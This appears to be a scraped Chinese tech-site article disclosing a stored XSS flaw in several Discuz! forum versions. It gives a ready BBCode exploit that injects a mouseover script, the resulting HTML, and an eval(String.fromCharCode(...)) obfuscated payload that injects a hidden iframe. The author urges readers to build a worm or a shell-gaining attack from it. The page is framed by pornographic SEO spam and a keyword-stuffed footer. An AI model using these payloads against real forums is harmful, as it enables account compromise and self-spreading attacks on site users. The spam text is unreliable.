成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Discuz!多版本爆存儲型XSS漏洞

安全 應用安全
本文主要給大家介紹了多版本爆存儲型XSS腳本漏洞的相關內容希望大家能夠從以下內容中得到您想要的知識。

XSS漏洞的測試案例分析如下:

2009年一次偶然間測試發現的此XSS漏洞,因為是存儲型的,我想大家應該知道它的危害吧。相隔這么多年Discuz不斷的更新版本,但此XSS漏洞依然存在。

在此我要感謝一下我的好朋友Jackal在09年的時候一起幫我測試漏洞的。當時我們一起測試的是Discuz6.0-Discuz7.2,不知道是不是通殺啊。沒有一個一個去測試。有條件的去測試一下吧。

發貼進入源碼模式,寫入如下的exp

  1. [email][url][img]http://www.linuxso.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email] 

上面代碼是以鼠標事件來觸發XSS的,剩下的大家可以自行發揮構造!

附上XSS完的源碼如下:

  1. <a href="mailto:"></a><a href="%5C%22http://qhkest.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://qhkest.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a>< 

我想你們一看就明白了吧!

漏洞證明:

本地測試結果:

Discuz! X2

Discuz!多版本爆存儲型XSS漏洞

以下應用華東耶穌的話:雞肋在于,要鼠標觸碰才能觸發,但是,鼠標觸碰還是概率很大很大的嘛。

把上面的alert(/DZ-XSS-0DAY/)換成

  1. eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,  
  2.  
  3. 121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,  
  4.  
  5. 101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,  
  6.  
  7. 34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,  
  8.  
  9. 102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,  
  10.  
  11. 48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,  
  12.  
  13. 84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,  
  14.  
  15. 105,108,100,40,102,41,59)) 

Discuz!多版本爆存儲型XSS漏洞

鼠標觸碰效果:

Discuz!多版本爆存儲型XSS漏洞

加密過程,就是10進制加密啦,如圖。

Discuz!多版本爆存儲型XSS漏洞

解密下看下代碼。

Discuz!多版本爆存儲型XSS漏洞

好了,希望看完的朋友能寫出個蠕蟲,或者寫個直接getshell的東西。我記得曾經有人寫過dz的xss直接getshell的。

Discuz和多版本爆存儲型XSS漏洞的介紹就結束了,有興趣的朋友請繼關注此類資源。

【編輯推薦】

  1. CC攻擊的思路及防范方法
  2. DDoS攻擊原理及防護方法論
  3. 利用窗口引用漏洞和XSS漏洞實現瀏覽器劫持
  4. 如何在php中修補XSS漏洞
  5. DISCUZ!昨日遭攻擊 “邪惡八進制”有嫌疑
責任編輯:佚名 來源: linux安全網
相關推薦

2013-11-27 17:12:27

2014-07-03 10:01:40

XSS漏洞存儲型XSS漏洞

2014-04-29 15:11:24

2019-03-25 07:27:14

XSS漏洞Ecshop

2021-10-08 16:33:29

漏洞網絡安全網絡攻擊

2021-03-27 09:47:02

漏洞安全Cisco Jabbe

2014-06-12 13:44:19

2015-02-10 14:32:37

XSS漏洞XSS

2014-05-22 09:31:44

2014-10-17 09:12:35

2013-11-14 10:27:54

2023-12-31 09:06:08

2010-04-30 15:45:09

2009-12-04 19:29:33

2021-09-26 05:32:58

漏洞OperaXSS

2014-05-15 10:00:31

Dropbox安全漏洞

2009-12-29 14:25:14

phpXSS漏洞

2009-04-30 17:12:50

2009-02-17 13:44:57

短信漏洞N73短信門

2013-02-22 13:39:57

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久草中文网| 精品久久久久久亚洲精品 | 中文成人在线 | 可以看黄的视频 | 久久久久精 | 成人a视频片观看免费 | 色888www视频在线观看 | 日韩成人免费视频 | 欧美一区二区在线播放 | 免费黄色成人 | 一级毛片免费完整视频 | 亚洲黄色在线 | 在线观看免费高清av | 日韩欧美精品一区 | 午夜一区二区三区 | 久久久久久高潮国产精品视 | 亚洲在线中文字幕 | 欧美日韩国产在线观看 | 国产精品1区 | 在线精品一区二区 | 黄色毛片免费 | 久久成人国产 | 久久久久中文字幕 | 日韩高清国产一区在线 | 综合久久久| 一二三四在线视频观看社区 | 久久综合入口 | 国产免费观看一级国产 | 久久宗合色 | 国产精品一区二区三区四区 | 免费大黄视频 | 欧美一级欧美一级在线播放 | 欧美一区在线看 | 久久精品久久久久久 | 欧美二区在线 | 国产精品视频导航 | 一区久久| 天天草视频 | 免费一看一级毛片 | 亚洲国产成人精品久久 | 精品国产色 |